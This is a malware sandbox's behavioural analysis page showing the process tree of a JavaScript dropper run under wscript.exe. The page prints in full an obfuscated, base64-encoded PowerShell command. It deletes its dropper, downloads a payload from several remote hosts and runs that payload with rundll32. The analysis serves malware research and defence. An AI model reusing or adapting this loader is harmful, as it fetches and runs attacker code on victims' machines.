| ZeroBOX

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Iwld.js

    1932
    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\diversityCourtby.js" isohelNoncumulatively Blackmailers storified thyrotomy

      2632
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEIAQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="

        2740

Process contents

No process loaded Click on a process in the tree above to load its data.